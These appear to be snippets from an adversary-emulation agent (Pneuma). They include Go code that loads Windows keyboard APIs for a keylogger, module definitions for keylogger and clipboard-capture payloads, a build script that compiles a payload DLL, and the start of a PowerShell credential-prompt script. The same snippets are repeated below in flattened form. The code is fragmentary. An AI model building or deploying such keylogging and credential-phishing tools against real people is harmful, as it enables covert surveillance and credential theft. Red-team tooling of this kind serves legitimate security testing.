Alex Manners khyberspache

## loadingWinDLL.go
var (
	user32            = syscall.NewLazyDLL("user32.dll")
	getAsyncKeyState  = user32.NewProc("GetAsyncKeyState")
	getKeyboardLayout = user32.NewProc("GetKeyboardLayout")
	getKeyState       = user32.NewProc("GetKeyState")
	toUnicodeEx       = user32.NewProc("ToUnicodeEx")
)

## pneumaEXModule.yml
platforms:
  windows:
    keyword:
      command: module.collect.keyLogger
      payload: "#{operator.payloads}/pneumaEX/collect/collect-windows.exe"

## commands.go
if executor == "keyword" {
	task := splitMessage(message, '.')
	if task[0] == "module" {
		var err error
		if !contains(util.InstalledModuleKeywords, task[1] + "." + task[2]) {
			err = util.InstallModule(task[1], payloadPath)
		}
		if err != nil {
			return err.Error(), 1, -1
		}

## commands.go
if executor == "keyword" {
	task := splitMessage(message, '.')
	if task[0] == "api" {
		return CallNativeAPI(task[1])
	} else if task[0] == "config" {
		return updateConfiguration(task[1], agent)
	}
	return "Keyword selected not available for agent", 0, 0
}

## commands_other.go
//+build !windows

package commands

func CallNativeAPI(task string) (string, int, int) {
	return "Not implemented for non-Windows platforms", 1, -1
}

## commands_windows.go
package commands

import (
	"encoding/json"
	"log"
	"os"
	"syscall"
	"unsafe"
)

## main.go
//+build cgo

package main

import "C"
import (
	"flag"
	"github.com/preludeorg/pneuma/sockets"
	"github.com/preludeorg/pneuma/util"
	"log"

## build.sh
GOOS=windows CC=x86_64-w64-mingw32-gcc CGO_ENABLED=1 go build --buildmode=c-shared --ldflags='-s -w -X main.key="MYKEYISBESTKEY" -extldflags "-Wl,--nxcompat -Wl,--dynamicbase -Wl,--high-entropy-va"' -o payloads/pneuma.dll main.go;

## Invoke-PromptForCredentials.ps1
$type=@"
using System;
using System.Text;
using System.Runtime.InteropServices;

public static class CredUI
{

	[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
	private struct CREDUI_INFO

## clipboard_module_ideal.yml
platforms:
  darwin:
    keyword:
      command: collect.captureClipboard
	var (
	user32 = syscall.NewLazyDLL("user32.dll")
	getAsyncKeyState = user32.NewProc("GetAsyncKeyState")
	getKeyboardLayout = user32.NewProc("GetKeyboardLayout")
	getKeyState = user32.NewProc("GetKeyState")
	toUnicodeEx = user32.NewProc("ToUnicodeEx")
	)
	platforms:
	windows:
	keyword:
	command: module.collect.keyLogger
	payload: "#{operator.payloads}/pneumaEX/collect/collect-windows.exe"
	if executor == "keyword" {
	task := splitMessage(message, '.')
	if task[0] == "module" {
	var err error
	if !contains(util.InstalledModuleKeywords, task[1] + "." + task[2]) {
	err = util.InstallModule(task[1], payloadPath)
	}
	if err != nil {
	return err.Error(), 1, -1
	}
	if executor == "keyword" {
	task := splitMessage(message, '.')
	if task[0] == "api" {
	return CallNativeAPI(task[1])
	} else if task[0] == "config" {
	return updateConfiguration(task[1], agent)
	}
	return "Keyword selected not available for agent", 0, 0
	}
	//+build !windows

	package commands

	func CallNativeAPI(task string) (string, int, int) {
	return "Not implemented for non-Windows platforms", 1, -1
	}
	package commands

	import (
	"encoding/json"
	"log"
	"os"
	"syscall"
	"unsafe"
	)
	//+build cgo

	package main

	import "C"
	import (
	"flag"
	"github.com/preludeorg/pneuma/sockets"
	"github.com/preludeorg/pneuma/util"
	"log"
	$type=@"
	using System;
	using System.Text;
	using System.Runtime.InteropServices;

	public static class CredUI
	{

	[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
	private struct CREDUI_INFO